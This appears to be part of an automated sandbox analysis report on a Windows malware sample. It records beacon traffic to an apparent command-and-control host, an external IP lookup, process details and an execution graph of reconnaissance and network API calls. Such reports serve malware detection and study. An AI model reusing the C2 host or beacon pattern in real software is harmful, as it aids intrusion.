                                                            Dec 27, 2024 15:06:00.069539070 CET98OUTGET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                                            Host: home.fiveth5ht.top
                                                            Accept: */*
                                                            Dec 27, 2024 15:06:01.615854979 CET372INHTTP/1.1 404 NOT FOUND
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 27 Dec 2024 14:06:01 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 207
                                                            Connection: close
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.7497095.101.3.217806528C:\Users\user\Desktop\5KwhHEdmM4.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 27, 2024 15:06:01.943034887 CET171OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                            Host: home.fiveth5ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                            Data Ascii: { "id1": "0", "data": "Done1" }
                                                            Dec 27, 2024 15:06:03.546766996 CET372INHTTP/1.1 404 NOT FOUND
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 27 Dec 2024 14:06:03 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 207
                                                            Connection: close
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.74970034.226.108.1554436528C:\Users\user\Desktop\5KwhHEdmM4.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-27 14:05:52 UTC52OUTGET /ip HTTP/1.1
                                                            Host: httpbin.org
                                                            Accept: */*
                                                            2024-12-27 14:05:53 UTC224INHTTP/1.1 200 OK
                                                            Date: Fri, 27 Dec 2024 14:05:53 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Connection: close
                                                            Server: gunicorn/19.9.0
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: true
                                                            2024-12-27 14:05:53 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                            Data Ascii: { "origin": "8.46.123.189"}


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:09:05:47
                                                            Start date:27/12/2024
                                                            Path:C:\Users\user\Desktop\5KwhHEdmM4.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\5KwhHEdmM4.exe"
                                                            Imagebase:0xd90000
                                                            File size:4'488'704 bytes
                                                            MD5 hash:0C9FC2B51C7C604FD0BD9789F344CB95
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:2%
                                                              Dynamic/Decrypted Code Coverage:1.9%
                                                              Signature Coverage:12.2%
                                                              Total number of Nodes:572
                                                              Total number of Limit Nodes:97
                                                              execution_graph 81254 da1139 81279 dcbaa0 81254->81279 81256 da1148 81257 da1512 81256->81257 81263 da1161 81256->81263 81264 da1527 81257->81264 81285 d9fec0 11 API calls 81257->81285 81259 da0f69 81260 da1f58 81259->81260 81261 da1fb0 81259->81261 81268 da0f00 81259->81268 81287 da0150 localeconv localeconv 81260->81287 81261->81268 81289 da4940 localeconv localeconv 81261->81289 81263->81259 81284 da0150 localeconv localeconv 81263->81284 81264->81259 81286 da22d0 11 API calls 81264->81286 81272 da0f21 81268->81272 81283 da0150 localeconv localeconv 81268->81283 81270 da1f61 81271 da1fa6 81270->81271 81288 dcd4d0 7 API calls 81270->81288 81271->81268 81271->81272 81273 d975a0 2 API calls 81271->81273 81278 da208a 81271->81278 81275 da2057 81273->81275 81277 d975a0 2 API calls 81275->81277 81277->81278 81290 da3900 localeconv localeconv 81278->81290 81280 dcbb60 81279->81280 81281 dcbac7 81279->81281 81280->81256 81281->81280 81291 db05b0 localeconv localeconv 81281->81291 81283->81272 81284->81259 81285->81264 81286->81259 81287->81270 81288->81271 81289->81271 81290->81268 81291->81280 80668 d9255d 80688 1119f70 80668->80688 80671 d92589 80672 d925a0 GlobalMemoryStatusEx 80671->80672 80673 d925ec 80672->80673 80690 727032e 80673->80690 80694 727031c 80673->80694 80698 7270224 80673->80698 80689 d9256c GetSystemInfo 80688->80689 80689->80671 80691 7270357 GetLogicalDrives 80690->80691 80693 7270423 80691->80693 80695 727033c GetLogicalDrives 80694->80695 80697 7270423 80695->80697 80699 727023c 80698->80699 80700 727031c GetLogicalDrives 80699->80700 80701 727030d GetLogicalDrives 80700->80701 80703 7270423 80701->80703 80704 e44720 80708 e44728 80704->80708 80705 e44733 80707 e44774 80708->80705 80715 e4476c 80708->80715 80720 e45540 7 API calls 80708->80720 80710 e4482e 80710->80715 80721 e49270 80710->80721 80712 e44860 80726 e44950 80712->80726 80714 e44878 80715->80714 80716 e430a0 80715->80716 80717 e431bc 80716->80717 80718 e430b0 80716->80718 80717->80707 80718->80717 80734 e43320 80718->80734 80720->80710 80739 e4a440 80721->80739 80723 e49297 80725 e492ab 80723->80725 80772 e4bbe0 7 API calls 80723->80772 80725->80712 80727 e44966 80726->80727 80731 e449c5 80727->80731 80733 e449b9 80727->80733 80774 e4b590 if_indextoname 80727->80774 80729 e44aa0 gethostname 80729->80731 80729->80733 80730 e44a3e 80730->80731 80775 e4bbe0 7 API calls 80730->80775 80731->80715 80733->80729 80733->80731 80737 e43332 80734->80737 80735 e433a9 80735->80717 80737->80735 80738 e59440 7 API calls 80737->80738 80738->80737 80740 e4a46b 80739->80740 80741 e4a4db 80740->80741 80768 e4d190 localeconv localeconv 80740->80768 80769 e4b180 localeconv localeconv 80740->80769 80770 e4a520 80740->80770 80742 e4aa03 RegOpenKeyExA 80741->80742 80752 e4ad14 80741->80752 80743 e4aa27 RegQueryValueExA 80742->80743 80744 e4ab70 RegOpenKeyExA 80742->80744 80745 e4aa71 80743->80745 80746 e4aacc RegQueryValueExA 80743->80746 80747 e4ac34 RegOpenKeyExA 80744->80747 80748 e4ab90 80744->80748 80745->80746 80755 e4aa85 RegQueryValueExA 80745->80755 80750 e4ab66 RegCloseKey 80746->80750 80751 e4ab0e 80746->80751 80749 e4acf8 RegOpenKeyExA 80747->80749 80767 e4ac54 80747->80767 80748->80747 80749->80752 80753 e4ad56 RegEnumKeyExA 80749->80753 80750->80744 80751->80750 80757 e4ab1e RegQueryValueExA 80751->80757 80752->80723 80753->80752 80754 e4ad9b 80753->80754 80756 e4ae16 RegOpenKeyExA 80754->80756 80760 e4aab3 80755->80760 80758 e4ae34 RegQueryValueExA 80756->80758 80759 e4addf RegEnumKeyExA 80756->80759 80763 e4ab4c 80757->80763 80761 e4af43 RegQueryValueExA 80758->80761 80771 e4adaa 80758->80771 80759->80752 80759->80756 80760->80746 80762 e4b052 RegQueryValueExA 80761->80762 80761->80771 80765 e4adc7 RegCloseKey 80762->80765 80762->80771 80763->80750 80765->80759 80766 e4afa0 RegQueryValueExA 80766->80771 80767->80749 80768->80740 80769->80740 80770->80741 80773 e4b830 if_indextoname 80770->80773 80771->80761 80771->80762 80771->80765 80771->80766 80772->80725 80773->80741 80774->80730 80775->80733 81292 e43c00 81293 e43c23 81292->81293 81295 e43c0d 81292->81295 81293->81295 81296 e5b180 81293->81296 81299 e5b19b 81296->81299 81300 e5b2e3 81296->81300 81299->81300 81301 e5b2a9 getsockname 81299->81301 81302 e5b020 closesocket 81299->81302 81304 e5af30 81299->81304 81308 e5b060 81299->81308 81300->81295 81313 e5b020 81301->81313 81302->81299 81305 e5af63 socket 81304->81305 81306 e5af4c 81304->81306 81305->81299 81306->81305 81307 e5af52 81306->81307 81307->81299 81312 e5b080 81308->81312 81309 e5b0b0 connect 81310 e5b0bf WSAGetLastError 81309->81310 81311 e5b0ea 81310->81311 81310->81312 81311->81299 81312->81309 81312->81310 81312->81311 81314 e5b052 81313->81314 81315 e5b029 81313->81315 81314->81299 81316 e5b04b closesocket 81315->81316 81317 e5b03e 81315->81317 81316->81314 81317->81299 81318 e5a080 81321 e59740 81318->81321 81320 e5a09b 81322 e59780 81321->81322 81328 e5975d 81321->81328 81323 e59925 RegOpenKeyExA 81322->81323 81322->81328 81324 e5995a RegQueryValueExA 81323->81324 81327 e59812 81323->81327 81325 e59986 RegCloseKey 81324->81325 81325->81328 81327->81320 81328->81327 81329 e4d190 localeconv localeconv 81328->81329 81329->81328 81330 d929ff FindFirstFileA 81331 d92a31 81330->81331 81332 d92a5c RegOpenKeyExA 81331->81332 81333 d92a93 81332->81333 81334 d92ade CharUpperA 81333->81334 81336 d92b0a 81334->81336 81335 d92bf9 QueryFullProcessImageNameA 81337 d92c3b CloseHandle 81335->81337 81336->81335 81339 d92c64 81337->81339 81338 d92df1 CloseHandle 81340 d92e23 81338->81340 81339->81338 80776 d93d5e 80781 d93d30 80776->80781 80777 d93d90 80785 d9fcb0 11 API calls 80777->80785 80780 d93dc1 80781->80776 80781->80777 80782 da0ab0 80781->80782 80786 da05b0 80782->80786 80785->80780 80787 da07c7 80786->80787 80793 da05bd 80786->80793 80787->80781 80788 da066a 80805 dcdec0 80788->80805 80792 da067b 80798 da06f0 80792->80798 80801 da07ce 80792->80801 80812 da73b0 localeconv localeconv 80792->80812 80793->80787 80793->80788 80793->80801 80810 da03c0 localeconv localeconv 80793->80810 80811 da7450 localeconv localeconv 80793->80811 80794 da07ef 80794->80801 80804 da0847 80794->80804 80825 da6fa0 80794->80825 80797 da0707 WSAEventSelect 80797->80798 80797->80801 80798->80794 80798->80797 80813 d976a0 80798->80813 80824 da7380 localeconv localeconv 80801->80824 80802 da09e8 WSAEnumNetworkEvents 80803 da09d0 WSAEventSelect 80802->80803 80802->80804 80803->80802 80803->80804 80804->80801 80804->80802 80804->80803 80806 dcdf1e 80805->80806 80807 dcdece 80805->80807 80833 dcdf30 80807->80833 80809 dcdef9 80809->80792 80810->80793 80811->80793 80812->80792 80814 d976c0 80813->80814 80815 d976e6 send 80813->80815 80814->80815 80816 d976c9 80814->80816 80818 d976d3 80815->80818 80820 d97704 80815->80820 80817 d9770b 80816->80817 80816->80818 80842 d972a0 localeconv localeconv 80817->80842 80841 d972a0 localeconv localeconv 80818->80841 80820->80798 80822 d9771c 80843 d9cb20 localeconv localeconv 80822->80843 80824->80787 80826 da6feb 80825->80826 80827 da6fd4 80825->80827 80826->80804 80827->80826 80828 da7207 select 80827->80828 80828->80826 80832 da7233 80828->80832 80829 da726b __WSAFDIsSet 80830 da729a __WSAFDIsSet 80829->80830 80829->80832 80831 da72ba __WSAFDIsSet 80830->80831 80830->80832 80831->80832 80832->80826 80832->80829 80832->80830 80832->80831 80837 dcdf44 80833->80837 80834 dcdfb5 80834->80809 80836 dcdfb9 80840 da7380 localeconv localeconv 80836->80840 80837->80834 80837->80836 80839 da7450 localeconv localeconv 80837->80839 80839->80837 80840->80834 80841->80820 80842->80822 80843->80820 80844 dc8b50 80845 dc8b6b 80844->80845 80873 dc8be6 80844->80873 80846 dc8b8f 80845->80846 80847 dc8bf3 80845->80847 80845->80873 80948 da6e40 select __WSAFDIsSet __WSAFDIsSet __WSAFDIsSet 80846->80948 80877 dca550 80847->80877 80851 dc8ba1 80852 dc8cd9 SleepEx getsockopt 80851->80852 80860 dc8cb2 80851->80860 80864 dc8bb5 80851->80864 80857 dc8d18 80852->80857 80853 dc8e85 80859 dc8eae 80853->80859 80853->80873 80954 da2a00 localeconv localeconv 80853->80954 80854 dca150 3 API calls 80866 dc8dff 80854->80866 80855 dc8c1f connect 80856 dc8c35 80855->80856 80936 dca150 80856->80936 80858 dc8d43 80857->80858 80857->80860 80865 dca150 3 API calls 80858->80865 80859->80873 80955 d978b0 closesocket 80859->80955 80860->80853 80860->80854 80860->80873 80864->80873 80950 dd50a0 localeconv localeconv 80864->80950 80865->80864 80866->80853 80952 dad090 localeconv localeconv 80866->80952 80867 dc8c8b 80867->80851 80870 dc8dc8 80867->80870 80951 dcb100 localeconv localeconv 80870->80951 80871 dc8e67 80953 dd4fd0 localeconv localeconv 80871->80953 80878 dca575 80877->80878 80881 dca597 80878->80881 80959 d975e0 80878->80959 80880 dca6d9 80883 dca709 80880->80883 80893 dca713 80880->80893 80983 da2a00 localeconv localeconv 80880->80983 80881->80880 80971 dcef30 80881->80971 80885 d978b0 3 API calls 80883->80885 80883->80893 80885->80893 80886 dc8bfc 80886->80855 80886->80856 80886->80860 80886->80873 80888 dca7e5 80892 dca811 setsockopt 80888->80892 80898 dca87c 80888->80898 80908 dca8ee 80888->80908 80889 dca641 80889->80888 80985 dd4fd0 localeconv localeconv 80889->80985 80892->80898 80900 dca83b 80892->80900 80893->80886 80984 dd50a0 localeconv localeconv 80893->80984 80894 dca69b 80981 dad090 localeconv localeconv 80894->80981 80896 dca6c9 80982 dd4f40 localeconv localeconv 80896->80982 80898->80908 80988 dcb1e0 localeconv localeconv 80898->80988 80900->80898 80986 dad090 localeconv localeconv 80900->80986 80903 dcaf56 80903->80880 80904 dcaf5d 80903->80904 80904->80893 80907 dca150 3 API calls 80904->80907 80905 dca86d 80987 dd4fd0 localeconv localeconv 80905->80987 80907->80893 80908->80880 80909 dcabb9 80908->80909 80911 dcacb8 80908->80911 80912 dcae32 80908->80912 80918 dcabe1 80908->80918 80920 dcaf33 80908->80920 80914 dcad45 80909->80914 80909->80918 80925 dcade6 80909->80925 80990 dc6be0 15 API calls 80909->80990 80910 dcb056 80999 dad090 localeconv localeconv 80910->80999 80911->80880 80911->80909 80928 dcacdc 80911->80928 80912->80909 80996 dd4fd0 localeconv localeconv 80912->80996 80913 dcaf03 80913->80920 80997 dd4fd0 localeconv localeconv 80913->80997 80919 dcad5f 80914->80919 80914->80925 80918->80880 80918->80910 80918->80913 80998 dd4fd0 localeconv localeconv 80918->80998 80991 de20d0 localeconv localeconv 80919->80991 80980 df67e0 ioctlsocket 80920->80980 80924 dcb07b 81000 dd4f40 localeconv localeconv 80924->81000 80994 dad090 localeconv localeconv 80925->80994 80926 dcad7b 80929 dcadb7 80926->80929 80992 dd4fd0 localeconv localeconv 80926->80992 80989 dad090 localeconv localeconv 80928->80989 80993 de3030 localeconv localeconv 80929->80993 80933 dcad01 80995 dd4f40 localeconv localeconv 80933->80995 80937 dca15f 80936->80937 80938 dc8c4d 80936->80938 80937->80938 80939 dca181 getsockname 80937->80939 80938->80867 80949 dd50a0 localeconv localeconv 80938->80949 80940 dca1f7 80939->80940 80941 dca1d0 80939->80941 80942 dcef30 2 API calls 80940->80942 81007 dad090 localeconv localeconv 80941->81007 80945 dca20f 80942->80945 80945->80938 81008 dad090 localeconv localeconv 80945->81008 80947 dca1eb 81009 dd4f40 localeconv localeconv 80947->81009 80948->80851 80949->80867 80950->80873 80951->80860 80952->80871 80953->80853 80954->80859 80956 d978d7 80955->80956 80957 d978c5 80955->80957 80956->80873 81010 d972a0 localeconv localeconv 80957->81010 80960 d975ef 80959->80960 80961 d97607 socket 80959->80961 80960->80961 80964 d97601 80960->80964 80965 d97643 80960->80965 80962 d9762b 80961->80962 80963 d9763a 80961->80963 81001 d972a0 localeconv localeconv 80962->81001 80963->80881 80964->80961 81002 d972a0 localeconv localeconv 80965->81002 80968 d97654 81003 d9cb20 localeconv localeconv 80968->81003 80970 d97674 80970->80881 80972 dcefa8 80971->80972 80973 dcef47 80971->80973 80979 dca63a 80972->80979 81006 d9c960 localeconv localeconv 80972->81006 80974 dcef4c 80973->80974 80975 dcef81 80973->80975 80974->80979 81004 df3d10 localeconv localeconv 80974->81004 81005 df3d10 localeconv localeconv 80975->81005 80979->80889 80979->80894 80980->80903 80981->80896 80982->80880 80983->80883 80984->80886 80985->80888 80986->80905 80987->80898 80988->80908 80989->80933 80990->80914 80991->80926 80992->80929 80993->80918 80994->80933 80995->80880 80996->80909 80997->80920 80998->80918 80999->80924 81000->80880 81001->80963 81002->80968 81003->80970 81004->80979 81005->80979 81006->80979 81007->80947 81008->80947 81009->80938 81010->80956 81341 dc95b0 81342 dc95c8 81341->81342 81343 dc95fd 81341->81343 81342->81343 81344 dca150 3 API calls 81342->81344 81344->81343 81345 dc6ab0 81347 dc6ad5 81345->81347 81346 dc6bb4 81348 e45ed0 11 API calls 81346->81348 81347->81346 81349 da6fa0 4 API calls 81347->81349 81350 dc6ba9 81348->81350 81351 dc6b54 81349->81351 81351->81346 81351->81350 81352 dc6b5d 81351->81352 81352->81350 81354 e45ed0 81352->81354 81357 e45a50 81354->81357 81356 e45ee5 81356->81352 81358 e45a58 81357->81358 81363 e45ea0 81357->81363 81359 e45b50 81358->81359 81372 e45a99 81358->81372 81373 e45b88 81358->81373 81364 e45eb4 81359->81364 81365 e45b7a 81359->81365 81359->81373 81360 e45e96 81398 e59480 7 API calls 81360->81398 81363->81356 81399 e46f10 7 API calls 81364->81399 81384 e470a0 81365->81384 81369 e45ec2 81369->81369 81370 e45be2 __WSAFDIsSet 81370->81372 81371 e45da1 __WSAFDIsSet 81378 e45cae 81371->81378 81372->81370 81372->81373 81375 e470a0 8 API calls 81372->81375 81393 e46f10 7 API calls 81372->81393 81373->81378 81394 e46d50 localeconv localeconv 81373->81394 81395 e45ef0 6 API calls 81373->81395 81375->81372 81378->81360 81378->81371 81380 e5a920 81378->81380 81396 e46d50 localeconv localeconv 81378->81396 81397 e59320 7 API calls 81378->81397 81381 e5a944 81380->81381 81382 e5a94b 81381->81382 81383 e5a977 send 81381->81383 81382->81378 81383->81378 81385 e470ae 81384->81385 81387 e4717f 81385->81387 81391 e471a7 81385->81391 81400 e5a8c0 81385->81400 81404 e471c0 6 API calls 81385->81404 81387->81391 81405 e46d50 localeconv localeconv 81387->81405 81389 e4719f 81406 e59320 7 API calls 81389->81406 81391->81373 81393->81372 81394->81373 81395->81373 81396->81378 81397->81378 81398->81363 81399->81369 81401 e5a8e6 81400->81401 81402 e5a903 recvfrom 81400->81402 81401->81402 81403 e5a8ed 81401->81403 81402->81403 81403->81385 81404->81385 81405->81389 81406->81391 81011 d931d7 81012 d931f4 81011->81012 81013 d93200 81012->81013 81017 d93223 81012->81017 81018 d915b0 localeconv localeconv 81013->81018 81015 d9321e 81016 d932dc CloseHandle 81016->81015 81017->81016 81018->81015 81019 d92f17 81028 d92f2c 81019->81028 81020 d931d3 81023 d9315c RegEnumKeyExA 81023->81028 81024 d91619 2 API calls 81025 d93046 RegOpenKeyExA 81024->81025 81026 d93089 RegQueryValueExA 81025->81026 81025->81028 81027 d9313b RegCloseKey 81026->81027 81026->81028 81027->81028 81028->81020 81028->81023 81028->81024 81028->81027 81029 d91619 81028->81029 81032 1121360 81029->81032 81031 d91645 RegOpenKeyExA 81031->81028 81033 11213b0 81032->81033 81034 1121379 81032->81034 81035 111d1d0 2 API calls 81033->81035 81039 111d1d0 81034->81039 81037 11213d0 81035->81037 81037->81031 81038 1121398 81038->81031 81045 111d1ed 81039->81045 81040 111d504 localeconv 81040->81045 81041 111c9c0 localeconv 81041->81045 81042 111ca50 localeconv 81042->81045 81043 111d3ae 81043->81038 81044 111cc90 localeconv 81044->81045 81045->81040 81045->81041 81045->81042 81045->81043 81045->81044 81046 d913c9 81050 d91160 81046->81050 81049 d913a1 81050->81049 81051 11193e0 81050->81051 81061 1118a20 localeconv localeconv localeconv localeconv 81050->81061 81057 1119400 81051->81057 81060 11193f3 81051->81060 81052 1119688 81053 11196c7 81052->81053 81052->81060 81062 1119280 vfprintf 81052->81062 81063 1119220 vfprintf 81053->81063 81056 11196df 81056->81050 81057->81052 81057->81053 81058 1119280 vfprintf 81057->81058 81059 1119220 vfprintf 81057->81059 81057->81060 81058->81057 81059->81057 81060->81050 81061->81050 81062->81052 81063->81056 81064 1217830 81077 111dd50 81064->81077 81066 1217866 81067 121785a 81067->81066 81081 11212c0 81067->81081 81069 12178a6 81070 121789a 81070->81069 81071 1217950 81070->81071 81075 1217906 81070->81075 81085 111b500 localeconv localeconv 81071->81085 81073 1217944 81074 1217979 81075->81073 81086 111b500 localeconv localeconv 81075->81086 81078 111dd61 81077->81078 81079 111d1d0 2 API calls 81078->81079 81080 111dd89 81079->81080 81080->81067 81082 11212cc 81081->81082 81087 111e050 81082->81087 81084 11212fa 81084->81070 81085->81074 81086->81074 81088 111e09d localeconv localeconv 81087->81088 81089 111e0ce 81087->81089 81088->81089 81089->81084 81407 121f250 81408 1121360 2 API calls 81407->81408 81410 121f282 81408->81410 81409 121f28e 81410->81409 81411 1121360 2 API calls 81410->81411 81412 121f2d3 81411->81412 81414 121f2ec 81412->81414 81415 1121420 localeconv localeconv 81412->81415 81415->81414 81416 dad5e0 81417 dad652 WSAStartup 81416->81417 81418 dad5f0 81416->81418 81417->81418 81419 dad664 81417->81419 81421 dad67c 81418->81421 81423 dad690 localeconv localeconv 81418->81423 81422 dad5fa 81423->81422 81090 dcb3c0 81091 dcb3ee 81090->81091 81092 dcb3cb 81090->81092 81094 d976a0 3 API calls 81092->81094 81096 dc9290 81092->81096 81093 dcb3ea 81094->81093 81097 d976a0 3 API calls 81096->81097 81098 dc92e5 81097->81098 81099 dc93c3 81098->81099 81101 dc92f3 81098->81101 81104 dc9392 81099->81104 81110 dad090 localeconv localeconv 81099->81110 81100 dc93be 81100->81093 81101->81104 81105 dc9335 WSAIoctl 81101->81105 81103 dc93f7 81111 dd4f40 localeconv localeconv 81103->81111 81104->81100 81112 dd50a0 localeconv localeconv 81104->81112 81105->81104 81108 dc9366 81105->81108 81108->81104 81109 dc9371 setsockopt 81108->81109 81109->81104 81110->81103 81111->81104 81112->81100 81113 dce400 81114 dce412 81113->81114 81119 dce459 81113->81119 81116 dce422 81114->81116 81137 de3030 localeconv localeconv 81114->81137 81115 dce4a8 81138 df09d0 localeconv localeconv 81116->81138 81119->81115 81121 dce495 81119->81121 81125 dcb5a0 81119->81125 81120 dce42b 81139 dc68b0 7 API calls 81120->81139 81121->81115 81124 dcb5a0 2 API calls 81121->81124 81124->81115 81126 dcb5d2 81125->81126 81127 dcb5c0 81125->81127 81126->81121 81127->81126 81128 dcb713 81127->81128 81133 dcb626 81127->81133 81141 dd4f40 localeconv localeconv 81128->81141 81130 dcb65a 81130->81126 81131 dcb72b 81130->81131 81132 dcb737 81130->81132 81131->81126 81142 dd50a0 localeconv localeconv 81131->81142 81132->81126 81143 dd50a0 localeconv localeconv 81132->81143 81133->81126 81133->81130 81133->81131 81133->81132 81140 dd50a0 localeconv localeconv 81133->81140 81137->81116 81138->81120 81139->81119 81140->81133 81141->81126 81142->81126 81143->81126 81144 dcb400 81145 dcb40b 81144->81145 81146 dcb425 81144->81146 81149 d97770 81145->81149 81147 dcb421 81150 d97790 81149->81150 81151 d977b6 recv 81149->81151 81150->81151 81152 d97799 81150->81152 81155 d977a3 81151->81155 81156 d977d4 81151->81156 81154 d977db 81152->81154 81152->81155 81161 d972a0 localeconv localeconv 81154->81161 81160 d972a0 localeconv localeconv 81155->81160 81156->81147 81158 d977ec 81162 d9cb20 localeconv localeconv 81158->81162 81160->81156 81161->81158 81162->81156 81163 dcf100 81166 dcf11f 81163->81166 81189 dcf1b8 81163->81189 81164 dcff1a 81213 dd0c80 localeconv localeconv 81164->81213 81167 dcf2a3 81166->81167 81180 dcf240 81166->81180 81184 dcf603 81166->81184 81166->81189 81198 dd4f40 localeconv localeconv 81167->81198 81169 dcf80d 81170 dd0045 81171 dd010d 81170->81171 81176 dd004d 81170->81176 81170->81189 81216 dd50a0 localeconv localeconv 81170->81216 81174 dd015e 81171->81174 81217 dd50a0 localeconv localeconv 81171->81217 81173 dd008a 81215 dd4f40 localeconv localeconv 81173->81215 81174->81176 81218 dd50a0 localeconv localeconv 81174->81218 81219 dd4f40 localeconv localeconv 81176->81219 81180->81189 81199 d97310 81180->81199 81183 dcf491 81183->81184 81188 d97310 2 API calls 81183->81188 81184->81164 81184->81169 81184->81170 81184->81173 81191 dd50a0 localeconv localeconv 81184->81191 81192 dd0d30 localeconv localeconv 81184->81192 81211 d9fa50 localeconv localeconv 81184->81211 81212 dd4fd0 localeconv localeconv 81184->81212 81185 dcff5b 81185->81189 81214 dd50a0 localeconv localeconv 81185->81214 81196 dcf50d 81188->81196 81190 dcf3ce 81190->81183 81190->81189 81208 dd50a0 localeconv localeconv 81190->81208 81191->81184 81192->81184 81194 dcf5b9 81210 d9fa50 localeconv localeconv 81194->81210 81196->81189 81196->81194 81209 dd50a0 localeconv localeconv 81196->81209 81198->81189 81200 d97320 81199->81200 81202 d97332 81199->81202 81201 d97390 81200->81201 81200->81202 81221 d972a0 localeconv localeconv 81201->81221 81204 d97380 81202->81204 81220 d972a0 localeconv localeconv 81202->81220 81204->81190 81205 d973a1 81222 d9cb20 localeconv localeconv 81205->81222 81208->81183 81209->81194 81210->81184 81211->81184 81212->81184 81213->81185 81214->81189 81215->81189 81216->81171 81217->81174 81218->81176 81219->81189 81220->81204 81221->81205 81222->81204 81223 dd0700 81224 dd099d 81223->81224 81226 dd0719 81223->81226 81226->81224 81227 dd09b5 81226->81227 81228 d97310 2 API calls 81226->81228 81230 dd0a35 81226->81230 81237 dd09f6 81226->81237 81241 dcb8e0 localeconv localeconv 81226->81241 81242 dff570 localeconv localeconv 81226->81242 81243 dbeb30 localeconv localeconv 81226->81243 81244 df13a0 localeconv localeconv 81226->81244 81245 e139a0 localeconv localeconv 81226->81245 81246 dbeae0 localeconv localeconv 81226->81246 81227->81224 81247 dd50a0 localeconv localeconv 81227->81247 81228->81226 81252 dd4f40 localeconv localeconv 81230->81252 81248 d975a0 81237->81248 81239 d975a0 2 API calls 81239->81224 81241->81226 81242->81226 81243->81226 81244->81226 81245->81226 81246->81226 81247->81224 81249 d975aa 81248->81249 81250 d975d1 81248->81250 81249->81250 81253 d972a0 localeconv localeconv 81249->81253 81250->81239 81252->81224 81253->81250

                                                              Executed Functions

                                                              Function 00DCF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
